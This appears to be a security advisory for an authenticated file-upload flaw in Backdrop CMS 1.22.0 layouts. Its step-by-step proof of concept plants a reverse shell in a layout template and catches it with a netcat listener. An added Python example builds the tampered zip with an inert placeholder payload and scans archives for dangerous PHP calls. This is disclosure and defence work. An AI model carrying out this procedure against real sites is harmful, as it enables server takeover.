Backdrop CMS 1.22.0 — Unrestricted File Upload (Layouts)
Description
An issue was discovered in Backdrop CMS 1.22.0. The Install new layouts page accepts a zip archive uploaded through its Manual installation option as a layout, and the PHP template contained in that archive is installed and executed by the web server with no restriction on its content. An administrator who is allowed to install layouts can therefore upload an archive whose template holds arbitrary PHP and obtain code execution on the server. Note that the attack requires an account with administrator privileges, so the impact is that a CMS administrator can execute commands on the underlying host.
Proof of Concept
First, we log in to the target application with admin privileges.
Then we navigate to Structure > Layouts > Install new layouts.
There we click Manual installation.
The form accepts layouts packaged as zip files.
Layouts can be found at the following link:
https://backdropcms.org/modules
We download the Harris Flexible layout.
Next, we unzip harris_flexible.zip
and change into the extracted harris_flexible directory.
We generate a reverse shell payload at https://www.revshells.com/. Because the template is executed as PHP, the payload is PHP code; the one used in this PoC spawns a PowerShell reverse shell.
We replace the content of the layout template layout--harris-flexible.tpl.php with the reverse shell payload.
After that, we zip the harris_flexible directory again.
We start a netcat listener on port 443.
We return to the Manual installation popup and upload the new harris_flexible.zip.
Next, we click the INSTALL button.
Finally, the tampered template is executed and we receive a shell connection on the listener.
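The packaging steps above, scripted, as an added example that is not part of the original PoC: it builds the tampered layout archive from a constructed stand-in for the unpacked harris_flexible directory (its file contents are assumptions, only the template name layout--harris-flexible.tpl.php comes from the PoC), uses a placeholder string where the revshells.com payload would be pasted so the code stays inert, and adds the check a defender could run on an uploaded layout archive before installing it: flag any member that calls a process-spawning, evaluation or socket PHP function, none of which a layout template needs. The list of flagged function names is my choice, not Backdrop's.

```python
import io
import re
import zipfile

# Constructed stand-in for the unpacked harris_flexible layout directory from
# backdropcms.org. File contents are illustrative, not the real layout's files.
LAYOUT_NAME = "harris_flexible"
TEMPLATE = "layout--harris-flexible.tpl.php"
LAYOUT_FILES = {
    "harris_flexible.info": (
        "name = Harris Flexible\n"
        "type = layout\n"
        "backdrop = 1.x\n"
        "template = layout--harris-flexible\n"
    ),
    TEMPLATE: (
        '<div class="layout--harris-flexible">\n'
        "  <?php print render($content['content']); ?>\n"
        "</div>\n"
    ),
    "harris_flexible.css": ".layout--harris-flexible { display: block; }\n",
}

# Placeholder for the payload pasted into the template in the PoC. The real PoC
# uses a PHP reverse shell generated at revshells.com; here the shell command is
# a dummy string so this example does nothing when the template is rendered.
REVERSE_SHELL_CMD = "PLACEHOLDER_POWERSHELL_ONELINER"
PAYLOAD = f"<?php system({REVERSE_SHELL_CMD!r}); ?>\n"

# PHP calls whose presence in a layout archive is a red flag (assumed list): a
# layout only needs to print render() output, never to spawn processes, open
# sockets or evaluate strings.
DANGEROUS_CALLS = re.compile(
    r"\b(eval|exec|system|shell_exec|passthru|popen|proc_open|fsockopen)\s*\("
)


def inject_payload(files, template, payload):
    """Return a copy of the layout files with the named template's content
    replaced by the payload (the PoC's edit of the .tpl.php file)."""
    if template not in files:
        raise KeyError(f"layout has no template named {template}")
    tampered = dict(files)
    tampered[template] = payload
    return tampered


def build_layout_zip(files, layout_name):
    """Pack the files under layout_name/ the way the PoC's zip step does and
    return the archive bytes ready to be uploaded via Manual installation."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, content in files.items():
            zf.writestr(f"{layout_name}/{name}", content)
    return buf.getvalue()


def find_dangerous_php(zip_bytes):
    """Scan every member of an uploaded layout archive (not only *.php, since
    PHP code can hide in any file the installer extracts) and map each member
    that calls a dangerous function to the sorted set of function names found.
    An empty dict means nothing was flagged."""
    flagged = {}
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            text = zf.read(info).decode("utf-8", errors="replace")
            hits = sorted(set(DANGEROUS_CALLS.findall(text)))
            if hits:
                flagged[info.filename] = hits
    return flagged


if __name__ == "__main__":
    clean = build_layout_zip(LAYOUT_FILES, LAYOUT_NAME)
    tampered = build_layout_zip(
        inject_payload(LAYOUT_FILES, TEMPLATE, PAYLOAD), LAYOUT_NAME
    )
    print("clean archive flagged:", find_dangerous_php(clean))
    print("tampered archive flagged:", find_dangerous_php(tampered))
```

Running the script flags only the tampered archive's template, under its archive path harris_flexible/layout--harris-flexible.tpl.php, for the system() call. Such a scan is a heuristic, not a fix: a layout is PHP code by design, so the real control is limiting who may install layouts at all.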
Author
Grim The Ripper Team by SOSECURE Thailand